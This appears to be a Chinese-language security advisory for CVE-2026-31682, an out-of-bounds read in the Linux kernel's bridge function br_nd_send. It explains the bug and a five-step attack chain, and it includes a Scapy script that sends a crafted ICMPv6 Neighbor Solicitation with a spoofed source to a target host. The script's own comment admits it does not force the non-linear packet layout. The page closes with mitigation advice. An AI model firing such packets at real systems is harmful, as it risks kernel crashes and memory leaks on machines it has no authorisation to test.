CVE-2026-31682 CVSS 9.1 严重

Linux Kernel br_nd_send 缓冲区越界访问漏洞

披露日期: 2026-04-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31682

漏洞类型

缓冲区越界访问

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核bridge模块中的br_nd_send函数存在安全漏洞。该函数在解析邻居发现（ND）选项时，错误地假设选项数据位于skb的线性区域。实际上，调用者仅保证ICMPv6头部和目标地址是线性的，选项区域可能仍是非线性的。解析非线性选项会导致访问线性缓冲区边界之外的数据，造成内存越界访问风险。

技术细节

漏洞根源在于Linux内核网络协议栈中br_nd_send()函数的实现逻辑。该函数负责从ns->opt[]数组中读取并解析邻居发现（ND）选项。在Linux内核网络子系统中，SKB（Socket Buffer）数据结构为了处理大数据包，允许数据分散存储在多个内存页中，即非线性区域。br_nd_send()函数的调用者仅确保了ICMPv6协议头部和目标地址字段位于SKB的线性数据区，并未对后续的ND选项进行线性化处理。因此，当ND选项数据位于非线性区域时，函数直接通过指针偏移访问ns->opt[]会导致越界读取线性缓冲区。攻击者可利用此缺陷读取内核敏感内存信息，或导致内核访问非法内存区域从而引发系统崩溃（拒绝服务）。

攻击链分析

STEP 1

侦察

识别网络中启用了IPv6桥接功能的Linux系统。

STEP 2

构造恶意报文

创建特制的ICMPv6邻居请求报文，利用分片或特定布局使选项数据在内核SKB中呈现非线性存储。

STEP 3

发送报文

将恶意报文发送给目标系统的网桥接口。

STEP 4

触发漏洞

目标内核处理报文时，br_nd_send函数在解析非线性选项时发生越界内存访问。

STEP 5

利用后果

导致内核崩溃（DoS）或泄露内核内存信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-31682
# This script sends a crafted ICMPv6 Neighbor Solicitation packet.
# The goal is to trigger the br_nd_send parsing logic.
# Requires Scapy: pip install scapy

from scapy.all import *
import sys

def send_crafted_packet(target_ip, target_mac):
    # Construct Ethernet header
    eth = Ether(dst=target_mac, src=get_if_hwaddr(conf.iface), type=0x86DD)
    
    # Construct IPv6 header
    ipv6 = IPv6(src="::1", dst=target_ip)
    
    # Construct ICMPv6 Neighbor Solicitation
    ns = ICMPv6ND_NS(tgt=target_ip)
    
    # Add Source Link-Layer Option
    # In a real scenario, specific fragmentation might be needed to force non-linear skb
    opt = ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(conf.iface))
    
    # Build packet
    pkt = eth / ipv6 / ns / opt
    
    # Send packet
    sendp(pkt, iface=conf.iface, verbose=1)
    print(f"[*] Packet sent to {target_ip}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ipv6> [target_mac]")
        sys.exit(1)
    
    target = sys.argv[1]
    mac = sys.argv[2] if len(sys.argv) > 2 else "33:33:00:00:00:01"
    send_crafted_packet(target, mac)

影响范围

Linux Kernel (修复补丁合并前的版本)

防御指南

临时缓解措施

如果无法立即升级内核，建议通过防火墙限制未受信任的IPv6流量，或在非必要情况下禁用IPv6桥接功能以减少攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表